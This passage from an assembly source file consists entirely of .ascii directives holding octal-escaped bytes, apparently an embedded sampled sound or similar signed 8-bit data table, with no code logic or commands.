"\355\353\352\350\345\343\340\336\337\336\334\335\340" .ascii "\337\340\343\347\351\355\361\366\373\377\000\004\011" .ascii "\013\013\017\023\023\023\025\024\023\023\021\020\022" .ascii "\020\015\015\017\014\012\013\014\012\013\014\013\014" .ascii "\014\012\012\013\012\010\011\011\007\006\006\004\003" .ascii "\001\000\377\000\376\374\375\375\373\372\372\372\371" .ascii "\371\370\367\367\365\360\357\356\351\345\344\343\337" .ascii "\334\334\332\332\332\331\333\340\341\342\350\355\357" .ascii "\362\370\374\000\005\010\013\017\021\021\023\025\024" .ascii "\023\025\024\022\021\017\014\012\007\004\002\001\375" .ascii "\371\371\367\362\361\360\357\356\356\355\356\357\356" .ascii "\356\360\361\360\360\364\364\363\364\364\364\365\364" .ascii "\362\363\364\362\360\361\360\355\353\353\351\347\346" .ascii "\344\343\343\340\335\335\335\332\332\334\334\334\336" .ascii "\337\341\344\346\351\355\361\363\367\374\376\000\004" .ascii "\010\012\016\021\022\025\027\027\030\033\033\031\031" .ascii "\033\031\027\026\024\021\020\014\012\011\007\003\002" .ascii "\002\000\376\376\376\377\377\000\000\003\005\004\006" .ascii "\011\012\011\014\016\015\015\015\014\013\012\006\004" .ascii "\003\377\372\366\364\356\350\345\341\335\333\330\326" .ascii "\326\327\326\330\335\340\342\350\355\362\367\374\001" .ascii "\006\012\015\020\025\026\026\030\032\032\031\031\031" .ascii "\030\026\026\024\024\021\016\015\015\011\007\006\005" .ascii "\002\000\376\374\374\372\367\366\370\366\365\365\367" .ascii "\364\366\365\371\367\373\370\373\372\374\366\371\367" .ascii "\371\366\355\343\357\034\367\337\311\347\363%\033 \022" .ascii "\010R!91\000\022\002\356\005\003\007\320+\022\301\377" .ascii "\324\320\365\355\006C\356\322\317\332\023D9$!\340\353" .ascii "\265\317\340\337\022\030\002\360\003\344\337\320\350" .ascii "\347\374\353\324\262\265\336\274\314\315\320\266\314" .ascii "\304\266\327\336\303\325\332\315\034\011\375\006\353" .ascii "\362\334\345\365\334\334\335\335\005\026\034*\374\010" .ascii "\014\013\034\011\002\370\017\022\031%0NW;IbGH=)/E?0" .ascii "8\031&!\027.4@/\"7=29\004\013\023\001\003\362\345\371" .ascii "&\025\003\016 \007\377\361\342\347\336\343\327\310\325" .ascii "\334\315\312\316\241\244\255\236\325\345\353\370\337" .ascii "\354\372\356\354\337\000\000\362\367\370\013.;-\034" .ascii "#,-,\017\036(.9?6;\026\023\017\001\023\021\013\353\031" .ascii "6$&\033\034,\037\022\376\017\015\351\360\340\337\371" .ascii "\343\361\373\351\373\364\340\357\007\002\006\015\010" .ascii "\331\342\307\241\242\244\312\272\276\331\366\001\014" .ascii "\012\356\367\003\351\342\314\276\317\260\266\315\314" .ascii "\353\344\336\353\335\012\026\010'\035\032+\026\003\031" .ascii "\032\004\373\004\017\032'\030%)5G+=ZQGR<@V3\036%*30" .ascii "\037,(1/+V_^X99>\032\026\011\360\373\016\370\345\373" .ascii "\372\370\363\355\336\341\336\341\323\325\336\336\320" .ascii "\300\317\300\331\305\275\330\345\347\001\374\0179&'" .ascii "\376\000\021\375\356\343\324\351\335\314\333\323\341" .ascii "\356\355\340\370\015\010\005\371\363\373\355\352\353" .ascii "\347\367\000\350\351\016\022\016\024\016\0258)*\032" .ascii "\025\034\374\377\001\004\015\003\373\372\363\017\010" .ascii "\367\013\023*\032\034'\037#\032\030\022\020\022\372" .ascii "\334\327\347\346\350\366\341\004\024\004\006\365\000" .ascii "\007\376\354\350\357\376\341\336\360\351\003\005\373" .ascii "\006\372\003\005\365\367\375\001\356\346\345\362\360" .ascii "\335\341\337\353\014\007\000\010('\023!\007\017\035" .ascii "\002\023$%3-\026\024\"*\035\031\"$'\027\024\034\036" .ascii "\037\021\365\335\325\351\350\342\376\012\027(#2:1:#" .ascii "';:('@9;4\025+)!2\036)\"\032\023\370\006\004\360\361" .ascii "\326\311\336\320\312\325\323\331\352\356\344\342\355" .ascii "\347\327\317\333\347\332\307\270\301\314\312\303\260" .ascii "\307\317\326\342\311\342\362\342\327\307\305\314\275" .ascii "\277\260\263\315\321\325\343\365\011\016\362\373\001" .ascii "\376\363\350\344\356\376\372\356\346\362\361\365\362" .ascii "\371\022\035\037'&8F290/C&##\035)\"(*4@;2;FTM==;C, " .ascii "\032\030\031\030\024 1JJ;NZZ@<.&!\003\366\362\350\360" .ascii "\357\330\357\365\361\336\310\314\322\345\341\330\335" .ascii "\352\344\334\316\313\323\341\344\330\370\012\027\013" .ascii "\017\033\034\024\013\005\370\374\356\332\316\320\312" .ascii "\320\306\302\321\331\346\344\327\345\364\365\361\341" .ascii "\342\352\345\332\316\320\343\342\310\321\336\340\367" .ascii "\355\343\365\007\012\004\365\002\005\374\363\350\354" .ascii "\360\377\353\335\363\373\373\003\364\022$&*).+\025\007" .ascii "\374\370\007\360\360\354\370\006\025\026\0312371+-," .ascii " \022\000\016\"\025\004\010\031\"# \03535!%\036\033" .ascii "!\011\371\371\000\017\001\001\377\000\022\011\002\017" .ascii "\034 \033\007\002\012\015\005\376\375\001\010\372\362" .ascii "\356\357\374\366\355\361\001\004\371\363\344\336\336" .ascii "\300\252\251\246\274\267\261\311\330\346\346\345\367" .ascii "\003\014\006\375\007\027\031\026\031\020\023\036\017" .ascii "\375\007\015\016\010\007\023\033\030\022\002\375\013" .ascii "\010\366\350\354\353\363\353\345\364\377\002\011\005" .ascii "\017\034\030\026\003\016\021\011\007\363\361\000\372" .ascii "\351\353\364\372\000\013\010\016\031\030\006\367\373" .ascii "\370\362\350\354\353\365\377\373\373\006\016\007\013" .ascii "\367\006\016\375\371\361\364\361\362\355\353\357\364" .ascii "\357\351\363\373\012\021\010\022 \036\033\024\015\015" .ascii "\020\006\375\370\373\002\364\355\364\375\003\377\003" .ascii "\001\012\014\004\016\371\367\007\362\363\370\362\363" .ascii "\361\365\367\003\016\025\032\035\034\031\032\021\002" .ascii "\003\001\355\354\355\352\346\334\326\320\323\325\322" .ascii "\311\317\335\340\343\350\354\355\372\354\364\000\370" .ascii "\011\006\004\017\032(417483\"(\"\032\016\006\000\375" .ascii "\002\371\365\375\004\017\014\016\022\021\020\011\010" .ascii "\001\003\003\366\367\365\356\370\365\355\376\375\002" .ascii "\011\001\013\014\011\006\377\003\010\003\377\362\355" .ascii "\360\347\342\342\347\353\363\371\362\373\000\000\375" .ascii "\362\376\367\361\353\337\343\333\340\334\337\362\356" .ascii "\371\377\367\013\020\003\011\011\011\011\005\002\375" .ascii "\377\377\376\000\003\004\007\014\011\011\016\021\013" .ascii "\013\014\011\015\005\376\372\366\367\360\355\365\363" .ascii "\370\373\377\377\012\017\007\021\015\022\027\023\014" .ascii "\011\010\004\001\371\376\376\376\372\366\373\367\372" .ascii "\365\353\342\326\321\307\302\300\272\303\315\325\335" .ascii "\346\363\372\376\010\025\031\034&&*/\"&%\025\034\022" .ascii "\014\024\014\017\017\014\022\017\023\017\011\013\010" .ascii "\377\374\375\365\366\367\371\367\376\003\005\377\000" .ascii "\007\004\005\006\004\000\376\375\367\365\371\355\370" .ascii "\365\356\376\376\000\007\001\003\004\005\000\374\374" .ascii "\364\366\355\360\360\365\364\357\357\362\360\360\363" .ascii "\352\354\361\373\373\374\006\003\375\003\003\005\005" .ascii "\011\013\007\025\023\024\032\021\031\037\027\027\031" .ascii "\024\024\013\011\010\005\006\002\005\001\003\007\013" .ascii "\011\016\017\023\020\022\020\010\011\002\000\372\374" .ascii "\002\000\001\004\007\005\012\022\012\015\010\002\006" .ascii "\375\374\370\360\352\352\341\342\336\320\314\306\306" .ascii "\276\306\312\320\324\332\334\331\342\346\345\343\352" .ascii "\363\371\373\005\011\017\027\030\031\035\032\030\024" .ascii "\023\014\006\011\372\372\366\360\365\365\355\363\360" .ascii "\356\361\361\362\357\367\362\356\360\362\355\360\364" .ascii "\360\360\363\364\363\364\365\370\365\367\373\376\001" .ascii "\376\372\374\375\377\367\366\364\355\361\354\352\357" .ascii "\360\362\370\372\377\000\003\005\377\000\374\373\373" .ascii "\367\367\366\365\367\372\004\007\014\025\031\037\"%" .ascii "%\"%&$\"#$$)'%+&&-%-+#'! \037\034\033\027\027\025\020" .ascii "\021\017\024\030\033\034\034#$ ## #\037\033\026\025" .ascii "\020\010\006\001\003\001\376\372\364\364\354\343\335" .ascii "\324\320\315\305\310\314\312\320\323\327\333\350\354" .ascii "\362\371\372\000\002\011" .ascii "\014\015\020\021\014\016\012\006\000\372\373\361\363" .ascii "\366\360\362\360\360\357\355\360\351\351\352\340\336" .ascii "\336\326\331\332\326\327\327\330\335\335\334\335\337" .ascii "\337\340\344\341\341\335\335\335\331\334\336\334\335" .ascii "\343\345\347\351\350\343\344\342\337\336\340\334\330" .ascii "\335\333\330\332\334\327\340\335\337\344\343\351\356" .ascii "\361\365\373\000\002\005\005\007\014\020\025\027\034" .ascii "\037#\037&#) &$#\"\"\034\036\031\033\017\007\370\365" .ascii "\"\342\022\037# EbV\001\322\000\354\023\024\002\360" .ascii " \263\352\027\270\325\006\304\341\014\336\003\311\340" .ascii "\251\012:\355\006\004\376\3502<;*\320\261\257\330\320" .ascii "\247\324\304\272\314\021\026\017\030\346\022A6)Q\"\377" .ascii "\376\016\376\021\361\332\000\316\363\317\341\007\335" .ascii "\303\350\320\312\354\302\335\311\326\350\370.\021\373" .ascii ".2'/;\025\032C;:&\030\014,5\005\010&\032\002\356\002" .ascii "(\014\006\000\351%\363\374\025\355\336\340(\030\357" .ascii "\355\363\354\015\366\351*\020\357$MWE@04B>0\036\036" .ascii "\363\366\037'\003\001\037\000\311\323\323\307\370\326" .ascii "\275\346\344\355\313\334\321\313\342\321\347\351\350" .ascii "\363(,*\">)&-(O) EB\016\017+\"\365\355\377\356\344" .ascii "\343\321\307\306\276\301\364\344\302\306\332\337\303" .ascii "\335\333\322\347\345\365\007\377\357\337\363\010\360" .ascii "\350\373\365\356\355\336\355\341\330\002\027\031,\037" .ascii "IS=WSJ,\031\012\375\343\324\274\322\314\246\320\316" .ascii "\343\302\242\321\303\357\373\355\005\007\371\00717\036" .ascii "\0305$1B2$\035\030\037$&\024\023#\025\006\026\035\017" .ascii "(\023\020*2%\036\031\011\377\371-$%'\353\347\360\351" .ascii "\333\326\311\305\321\351\362\353\357\004\021\027 \002" .ascii "\002\025\022\0176(\021\033\000\023 \375\376\001\367" .ascii "\365\364%0\"\036\"\017\007\030\002\020\350\334\377\006" .ascii "\371\355\350\327\344\335\346\336\332\315\301\315\324" .ascii "\350\331\334\353\357\351\360\026\011\371\366\366\037" .ascii "' \023\021)\023\001\024\015\372\361\356\366\370\364" .ascii "\350\336\334\263\271\324\326\300\312\352\326\362\365" .ascii "\342\356\351\336\316\323\334\312\311\327\337\337\377" .ascii "\020\024\017\012\0052C+/(:\021'<&\035\022\015))\030" .ascii " #\037\014\037.,\023\032\022\021\036\003\376\022\003" .ascii "\372\375\372\000\331\322\320\331\337\341\353\367\001" .ascii "\377\02508\037(.1,/,%0\023&.\"\370\345\357\301\334\340" .ascii "\337\364\353\360\357\012\026\012\005\026\032\015\036" .ascii "9953.\037\032\012\362\367\313\325\307\317\336\251\275" .ascii "\277\311\327\334\345\342\354\352\361\026\033\006\023" .ascii "\030\024\021\036\035\013\367\335\362\005\002\345\351" .ascii "\357\326\357\360\003\004\354\360\374\020\035\011\373" .ascii "\006\362\347\345\361\323\310\303\310\317\340\333\310" .ascii "\344\275\303\313\322\312\305\312\310\335\343\377\367" .ascii "\372\016\000\013\"%\017\027\035\037#\037 \023%\010\007" .ascii ",.\027(?,059;:17;:(\033\037\025\011\017\023\000\367" .ascii "\366\373\364\376\357\363\013\001\003):\023\015\010\017" .ascii "\375\000\366\353\354\336\340\343\003\375\354\346\351" .ascii "\337\340\342\350\350\364\012\014\0300\033\007&\017\031" .ascii "93!\030\")8:\037\023\035\030\016\030\026\007\375\373" .ascii "\374\367\000\361\343\333\327\330\324\320\315\277\257" .ascii "\264\304\273\263\273\261\300\277\327\354\354\346\351" .ascii "\366\004\010\015\007\000\002\364\001\007\005\343\342" .ascii "\347\346\337\337\336\315\330\340\355\020\032\030\032" .ascii "#61-0%\017\012\371\376\371\341\330\332\326\317\326\336" .ascii "\324\313\316\340\367\376\363\352\001\013\010\024.\016" .ascii "\001\026\011\037&\013\376\004\001\367\377\017\005\364" .ascii "\364\007\016\023&\037'-59NY9@BFPPOF+7/+&\375\371\377" .ascii "\377\374\373\375\370\355\365\360\362\346\332\311\314" .ascii "\326\316\333\341\344\326\341\342\346\341\326\347\337" .ascii "\351\364\377\020\004\000\010\020\017\025\026\014\007" .ascii "\003\375\004\017\007\365\363\372\372\372\375\376\362" .ascii "\356\370\375\000\010\374\366\010\014\012\020\012\021" .ascii "\007\001\001\011\000\363\357\353\364\344\357\354\344" .ascii "\337\344\351\352\351\342\330\324\324\320\331\344\323" .ascii "\304\322\335\343\327\323\326\334\326\317\321\323\323" .ascii "\307\311\344\324\344\365\366\004\375\015\022 \036\027" .ascii "\024\037\037\031\032\035\020\022\035\031%\034\027\033" .ascii "$&67AA9A>FHC2,-#\034%!\012\011\023\012\011\015\014\022" .ascii "\027\027\032%\032\016\015\031\023\003\006\371\000\375" .ascii "\353\360\341\314\310\255\271\260\247\273\266\300\273" .ascii "\312\330\353\364\365\376\027!\0310988A?<4'\027\032\032" .ascii "\005\003\014\002\363\371\376\375\012\003\374\022\003" .ascii "\005\014\023\021\377\012\030\014\376\376\362\357\356" .ascii "\356\345\350\342\320\322\334\327\320\327\330\324\325" .ascii "\340\344\353\352\336\336\346\341\326\333\340\323\310" .ascii "\322\341\334\322\325\322\336\335\325\327\336\324\311" .ascii "\335\336\336\352\364\365\000\012\014\022\032\031\020" .ascii "\031#\036\034\"##)&\037,.%%+0-1* %%\037-1\"#*#\030\036" .ascii "!\030\033\032\026\030\033\030\025\"\037\031\034\037" .ascii "\022\005\011\012\377\373\361\355\357\346\345\337\350" .ascii "\335\315\312\322\311\306\323\312\325\343\345\346\370" .ascii "\364\344\366\363\372\370\374\013\002\017\021\033\" " .ascii "\025\032%\037\033\035\"\034\034\033\031\030\031\020" .ascii "\011\012\007\003\374\375\370\347\360\356\356\371\356" .ascii "\347\000\373\356\006\001\375\374\007\012\377\001\375" .ascii "\373\375\370\357\352\351\344\327\325\330\317\306\310" .ascii "\311\304\306\315\321\331\333\335\340\355\364\345\350" .ascii "\357\341\342\344\337\337\341\333\334\342\341\335\337" .ascii "\350\353\360\366\374\377\005\003\025\035\035!(4*'/3" .ascii ",)$\"$ \031\032\037\034\024\032 \031\031\033 \"(''3" .ascii "33;=2>@55,-'\036\031\003\010\020\006\366\363\372\355" .ascii "\351\343\340\335\327\320\322\332\333\327\337\352\347" .ascii "\346\360\370\363\367\371\372\000\004\001\004\016\013" .ascii "\005\007\014\000\366\372\370\364\365\366\364\364\365" .ascii "\351\355\375\363\357\375\366\364\355\356\363\357\361" .ascii "\351\353\363\363\350\355\363\356\357\361\361\364\364" .ascii "\361\362\371\372\367\377\002\002\003\003\014\010\001" .ascii "\002\374\006\373\360\365\367\372\350\350\357\352\354" .ascii "\360\344\346\355\342\352\360\357\353\366\004\000\004" .ascii "\015\027\024\020\021\017\027\025\012\011\017\007\376" .ascii "\002\004\375\375\376\376\000\375\375\377\017\010\010" .ascii "\016\023\023\021\033\020\031\021\013\024\016\012\003" .ascii "\375\013\002\367\377\007\007\001\017\014\017\025\027" .ascii "\032\037\031\023\037$\035\027\031\025\017\014\003\370" .ascii "\366\352\332\330\333\324\317\331\336\344\351\361\370" .ascii "\377\012\013\032'(+8@85;<93'\031\032\026\012\010\010" .ascii "\000\361\373\375\357\361\357\361\371\365\363\366\377" .ascii "\366\361\373\373\370\363\363\360\357\354\345\341\345" .ascii "\337\325\327\334\325\320\324\330\330\331\334\333\342" .ascii "\343\334\341\353\337\331\340\341\340\335\335\337\336" .ascii "\342\331\323\333\333\322\322\331\317\325\335\344\351" .ascii "\346\354\362\000\001\377\012\024\023\024\037\"!!$''" .ascii "'%%'#\032*( $#\005\015!\032\026\377\371\354\004\037" .ascii "5.4EBOCC6\035\006$#\027\037\004 \005\023\022\0062\026" .ascii "\006 \031\370\025\327\337\354\327\336\310\301\276\335" .ascii "\330\336\326\376\004\033\005\363\014\372\022\367\366" .ascii "\365\013\007\354\372\370\377\004\374\005\033)\"\023" .ascii "#\033\023\035\371\357\355\343\340\314\277\331\316\307" .ascii "\331\312\326\354\004\353\334\362\377\365\356\364\366" .ascii "\360\366\361\321\346\365\341\340\362\010\030\021\003" .ascii "\365\377\376\363\335\340\357\323\333\314\310\365\353" .ascii "\347\366\357\012\022\022\010\001\025\027\025\010\372" .ascii "\001\012\363\331\352\375\005\377\377\021$;33166-+%(" .ascii "\037\036\020\014(\032\030$\016*7\027!\032\037(\012\003" .ascii "\375\012\001\354\347\360\021\017\021\035#4:) #(#\020" .ascii "\002\374\371\370\332\311\316\337\330\313\317\306\332" .ascii "\341\323\333\337\353\367\333\335\352\347\351\335\326" .ascii "\346\375\011\376\007\024\032,\035\032\036' \015\004" .ascii "\005\015\363\343\352\357\371\374\363\372\012\022\036" .ascii "\014\014\027\035\027\370" .ascii "\366\360\352\357\326\307\342\353\345\341\346\367\002" .ascii "\011\376\377\026\031\010\376\375\000\372\375\357\342" .ascii "\363\375\371\363\364\374\004\001\363\357\000\005\364" .ascii "\336\333\333\335\332\304\306\351\350\341\372\001\026" .ascii "!\036\037#,5$\025\016\010\016\000\355\353\005\010\375" .ascii "\002\006\026(\036\024\0363,\036\032\025\026\022\016" .ascii "\374\373\012\010\001\005\006\024\037\022\006\012\025" .ascii "\023\004\364\366\376\375\362\354\363\007\004\375\375" .ascii "\006\030\032\023\014\015\020\012\362\344\326\316\311" .ascii "\265\252\254\301\304\301\304\326\363\376\376\002\021" .ascii "$(\024\026 \036\035\022\004\015\033\023\012\010\016" .ascii "\032\036\024\011\017\032\021\373\363\365\371\360\341" .ascii "\337\356\373\371\364\376\013\027\035\023\021\026\031" .ascii "\017\373\362\360\356\354\330\316\336\354\347\340\352" .ascii "\374\012\017\005\007\031\031\013\373\374\370\364\355" .ascii "\337\330\341\353\341\336\336\351\364\367\354\350\371" .ascii "\001\364\345\346\362\372\361\346\351\001\015\006\014" .ascii "\030(14.+74(\026\021\017\012\004\355\352\371\001\371" .ascii "\365\000\022\037\035\021\027(&\022\012\014\015\013\000" .ascii "\366\366\004\005\377\000\006\021\032\025\012\014\030" .ascii "\030\002\364\362\365\361\342\321\323\344\346\326\331" .ascii "\346\357\363\355\347\350\365\362\343\334\334\335\343" .ascii "\333\321\331\355\372\363\370\012\037(%\"+=6!\032\035" .ascii "\031\017\004\366\373\004\001\372\372\003\011\015\007" .ascii "\372\376\011\002\356\345\354\357\357\340\331\347\370" .ascii "\367\357\371\014\026\027\021\020\030\036\023\000\372" .ascii "\370\361\353\336\320\330\344\343\333\341\361\377\003" .ascii "\370\367\004\017\000\355\355\364\361\345\334\331\343" .ascii "\356\354\352\365\003\015\023\016\014\032#\036\016\015" .ascii "\022\024\021\005\002\023!\033\023\036273)+3. \013\011" .ascii "\010\001\370\353\347\362\374\367\362\375\020\034\036" .ascii "\032\033+3!\022\026\032\021\003\367\365\000\001\365" .ascii "\361\373\004\003\376\366\360\363\362\337\317\315\315" .ascii "\313\301\270\273\317\333\326\326\355\001\010\011\010" .ascii "\025 !\021\011\016\016\002\367\360\360\376\001\372\371" .ascii "\005\026\032\030\022\024 \036\011\375\001\004\372\347" .ascii "\340\345\356\353\341\341\361\373\366\371\364\373\003" .ascii "\000\364\347\356\361\347\342\334\343\365\371\360\362" .ascii "\011\026\024\015\011\015\024\007\356\346\352\344\323" .ascii "\311\304\311\316\320\313\320\343\361\366\370\373\006" .ascii "\025\025\006\003\017\023\011\377\377\012\025\022\012" .ascii "\023%*%#%),%\026\022\026\025\014\006\003\012\026\032" .ascii "\023\027+2.()11\"\021\015\022\010\370\362\365\374\376" .ascii "\002\001\010\030 \036 !%*$\021\011\015\007\367\351\346" .ascii "\350\347\335\322\325\341\340\332\334\341\346\352\345" .ascii "\341\343\353\353\352\357\365\000\015\022\023\033-4," .ascii ")+-)\031\011\006\007\374\351\347\351\352\352\351\351" .ascii "\361\376\377\377\003\006\007\010\003\370\365\370\364" .ascii "\347\341\344\350\352\346\341\353\370\365\356\361\370" .ascii "\371\364\355\351\351\352\345\336\340\341\342\346\347" .ascii "\346\351\365\365\357\356\357\355\351\337\323\324\330" .ascii "\317\303\311\323\327\334\343\352\371\007\012\017\032" .ascii "!!#\"\034\033\036\033\022\016\017\022\023\016\013\021" .ascii "\034\026\017\025\032\030\020\011\012\013\007\004\376" .ascii "\003\011\007\016\022\025\032#&!#%$\036\025\015\014\014" .ascii "\003\365\367\375\373\370\370\374\002\006\002\377\004" .ascii "\004\374\366\363\354\347\346\341\333\333\340\343\347" .ascii "\353\356\371\005\007\006\016\030\030\026\025\027\031" .ascii "\031\025\021\030\034\031\031\037!!&$ \037\036\027\021" .ascii "\011\376\372\370\360\345\347\355\353\352\355\364\375" .ascii "\002\377\001\012\016\012\005\007\005\000\377\373\370" .ascii "\366\370\365\363\365\363\367\374\370\361\363\366\360" .ascii "\351\344\344\340\337\331\325\333\340\334\334\344\353" .ascii "\356\361\370\366\373\376\374\375\375\371\367\374\371" .ascii "\365\370\003\002\005\012\021\030\036\037\036%)\"\033" .ascii "\036\034\026\020\016\012\010\010\004\003\006\006\005" .ascii "\011\011\005\005\011\006\001\001\002\002\002\377\376" .ascii "\005\013\010\010\020\025\024\024\025\023\022\015\005" .ascii "\376\372\361\347\343\335\324\317\322\320\314\320\324" .ascii "\330\335\337\341\352\361\357\357\366\374\373\374\377" .ascii "\002\007\012\013\016\022\025\023\025\027\023\022\025" .ascii "\021\012\011\007\004\003\001\374\000\006\003\000\007" .ascii "\013\010\006\006\007\005\003\373\367\366\362\352\350" .ascii "\353\345\345\351\353\354\361\370\372\000\002\002\005" .ascii "\013\007\001\003\003\373\366\365\361\360\355\350\346" .ascii "\350\346\341\341\343\337\333\336\335\332\334\337\337" .ascii "\344\351\353\362\376\002\004\016\031\032\034!#$#\037" .ascii "\032\034\030\020\016\020\015\012\015\017\020\023\026" .ascii "\030\034\036\034\035!\036\030\030\032\025\020\017\016" .ascii "\016\015\012\012\016\017\013\014\021\017\014\015\015" .ascii "\013\012\012\010\011\011\005\007\013\011\005\006\011" .ascii "\004\375\373\366\360\353\343\334\334\331\321\320\326" .ascii "\330\330\337\347\356\366\377\005\017\027\032\036%%!" .ascii "#%!\035\033\031\027\026\021\016\021\017\012\006\012" .ascii "\007\000\000\375\373\372\371\365\366\370\367\370\375" .ascii "\377\376\001\005\005\003\004\003\000\377\372\365\366" .ascii "\364\355\352\356\356\353\355\357\361\363\365\364\367" .ascii "\371\365\362\364\361\352\350\350\342\336\334\333\332" .ascii "\332\331\331\340\344\342\345\354\360\360\364\371\374" .ascii "\000\003\004\011\017\020\022\032\036\034\037$\"\037" .ascii "\037\035\032\027\021\013\012\010\000\375\000\377\374" .ascii "\375\000\002\005\007\007\013\020\016\015\021\021\015" .ascii "\014\016\014\011\011\010\007\007\005\002\005\006\377" .ascii "\375\377\375\367\364\362\356\353\350\342\341\342\335" .ascii "\333\340\341\337\340\346\346\350\352\354\357\362\361" .ascii "\361\367\373\371\373\003\007\007\012\020\023\027\031" .ascii "\031\034 \034\031\033\032\024\021\020\015\010\006\003" .ascii "\000\377\374\370\372\373\366\365\370\366\363\362\363" .ascii "\363\364\364\361\365\371\367\364\372\375\375\375\001" .ascii "\001\000\000\376\375\374\367\363\366\366\361\333\364" .ascii "\357\352\376\031\014\025:\357\367\373\353\007\360\007" .ascii "*\366\331\031\002\335\373\356\000\003\332\372\367\265" .ascii "\312\337\327\377\020\362\354\355\374\361\345\376\020" .ascii "\015\355\374\026\006\347\374\011\022\021\032\031\347" .ascii "\326\347\344\277\335\004\331\256\301\324\325\300\342" .ascii "\000\375\0135[SU=6/\023\024)\341\334\371\276\320\355" .ascii "\353\371\370\346\374\363\343\017!\342\344\003\011\021" .ascii "\022(#\005\360\015\010\362\032\033\373\024!\026\014" .ascii "\374\002#\024\033B6\036#A'#))4\026\017!\001\357\"+\025" .ascii "\037*\027\014\010\364\376\326\337\023\362\371'#\016" .ascii "#\023\353\342\336\362 \004\371\027\353\327\353\354\355" .ascii "\347\360\001\363\356\000%\" *!\"\035\024\021\366\336" .ascii "\012\367\351\020\034\004\354\003\376\362\355\366\010" .ascii "\366\372\026\021\370\364\004\365\351\355\357\361\325" .ascii "\314\351\310\257\326\307\305\336\351\340\333\326\343" .ascii "\372\351\000#\022\365\006\371\334\340\334\360\362\351" .ascii "\0233\025\0240\005\373\005\360\372\347\332\345\334\315" .ascii "\346\377\361\364\015\010\371\014\012\021\001\347\001" .ascii "\005\351\000\027\373\371\000\004\010\016\03483)EC$%" .ascii "/\035\034 !\034\010\377\014\364\324\365\365\337\360" .ascii "\364\365\375\371\033=69QN:<:'\023\007\021\017\370\011" .ascii "\023\364\355\352\305\251\267\303\323\335\335\366\365" .ascii "\331\346\364\345\360\004\015\014\006\023&*!/3\020\033" .ascii "!\003\002\001\364\373\370\365\021\013\370\017\022\364" .ascii "\372\003\371\372\363\365\372\333\323\344\313\264\313" .ascii "\314\276\315\314\316\327\303\315\354\341\353\016\006" .ascii "\371\005\004\376\003\004\005\004\355\352\364\324\312" .ascii "\336\326\317\342\364\011\017\011\026\027\364\365\002" .ascii "\346\334\344\337\333\334\341\356\355\344\370\005\366" .ascii "\014!\023\023\031\024\037\033\03490\035/0\031\030\037" .ascii "\035\031\021\025\036\004\363\005\367\350\371\377\373" .ascii "\003\010\013\022\010\020&\034\03797-8AEB=D<$\"'\012" .ascii "\365\375\360\352\365\364\007\011\362\365\347\275\274" .ascii "\323\320\327\360\362\362\361\351\360\351\337\366\002" .ascii "\367\005\036\036'34?5.D=\"-,\022\016\016\006\001\371" .ascii "\361\356\334\306\314\305\266\306\315\313\317\323\332" .ascii "\340\325\340\372\362\362\021\022\002\011\007\000\000" .ascii "\373\000\005\361\351\363\346\327\340\335\326\327\322" .ascii "\327\325\307\323\334\315\337\373\001\012\033\031\021" .ascii "\007\370\371\356\327\341\352\334\342\361\361\363\364" .ascii "\374\016\017\024/2\",.\037\"%\"%\035\030\031\010\371" .ascii "\000\374\357\372\005\002\001\377" .ascii "\005\013\000\012$ \03767-0-)-&+7+*92*2,$!\032\031\020" .ascii "\372\375\375\347\353\374\367\366\371\354\335\310\267" .ascii "\302\315\312\335\366\363\365\001\000\000\003\012\032" .ascii "\036\"7=4??.*'\036\032\013\376\376\354\330\337\340\322" .ascii "\332\346\344\342\337\342\350\341\345\371\370\366\003" .ascii "\377\370\367\362\361\364\354\361\373\354\346\357\343" .ascii "\327\342\346\344\346\347\357\355\341\346\354\333\331" .ascii "\341\332\327\324\316\322\317\311\332\352\350\367\007" .ascii "\376\373\377\366\361\360\361\374\376\376\020\024\010" .ascii "\016\024\015\015\021\022\026\011\375\002\366\344\356" .ascii "\364\356\367\001\002\006\006\010\022\021\027+--86/." .ascii "()* $,\033\017\027\015\377\006\013\015\023\025 '\037" .ascii "\")\037\035!\034\027\022\007\003\374\360\367\373\357" .ascii "\361\363\335\315\313\306\307\320\334\360\371\371\011" .ascii "\020\007\012\021\022\026\030\035(\"\032\"\027\004\007" .ascii "\004\367\371\371\361\356\351\347\355\352\354\375\377" .ascii "\371\002\004\375\372\367\373\376\363\365\377\361\346" .ascii "\354\346\334\340\340\340\343\335\336\337\324\324\335" .ascii "\326\325\340\342\341\343\342\346\342\327\340\345\327" .ascii "\332\346\337\336\347\353\363\372\374\011\014\000\002" .ascii "\002\362\355\355\347\350\350\351\360\353\347\362\360" .ascii "\346\364\375\370\377\007\007\011\010\013\027\026\025" .ascii "%*#&)$!\034\037%\033\033$\032\022\032\025\016\025\026" .ascii "\025\030\024\026\031\016\016\032\025\022\035##\"\037" .ascii "#\037\017\024\031\012\010\017\006\004\007\004\007\010" .ascii "\001\003\375\352\347\346\333\334\346\347\351\353\356" .ascii "\364\354\345\361\360\347\364\001\002\014\025\031 \035" .ascii "\032$\"\032#$\031\030\026\016\012\003\002\003\366\363" .ascii "\371\353\340\347\342\333\336\337\342\345\337\344\355" .ascii "\344\343\360\357\352\360\362\360\354\346\351\347\334" .ascii "\342\350\337\341\352\344\343\347\343\346\347\343\355" .ascii "\362\351\361\376\371\371\002\003\000\372\364\365\351" .ascii "\331\335\332\317\325\334\334\343\351\354\367\372\375" .ascii "\015\021\020 & %+*)'+0$!)\037\024\030\027\021\023\020" .ascii "\023\027\017\017\030\021\016\031\027\024\032\032\031" .ascii "\030\025\033\035\025\037*\"%/+&%!# \025\032\035\017" .ascii "\015\023\012\002\000\367\356\341\325\324\314\304\316" .ascii "\322\316\332\344\345\355\363\370\003\005\010\033!\037" .ascii ".70//+&\034\031\033\016\005\011\001\367\372\367\363" .ascii "\366\363\363\367\357\356\365\354\350\362\360\350\354" .ascii "\355\353\347\342\347\351\336\341\353\344\342\351\347" .ascii "\351\353\352\363\370\364\373\003\372\372\377\366\360" .ascii "\360\353\347\341\335\342\335\324\334\340\325\330\335" .ascii "\332\333\332\333\346\346\346\367\000\375\011\024\022" .ascii "\026\030\031\032\026\027\033\023\016\025\020\010\017" .ascii "\021\016\021\021\025\032\023\024 \034\027!$\037 \037" .ascii "\035\024\026\030\016\015\023\014\012\017\016\017\024" .ascii "\025\037%\",4+*1*\" \034\030\016\004\006\376\355\353" .ascii "\347\326\317\312\303\303\303\304\321\327\331\352\364" .ascii "\364\001\015\014\021\031\036\"!&/'\036$\037\022\020" .ascii "\015\010\005\375\373\000\366\362\373\367\362\370\370" .ascii "\364\365\363\362\360\351\354\357\345\345\356\347\343" .ascii 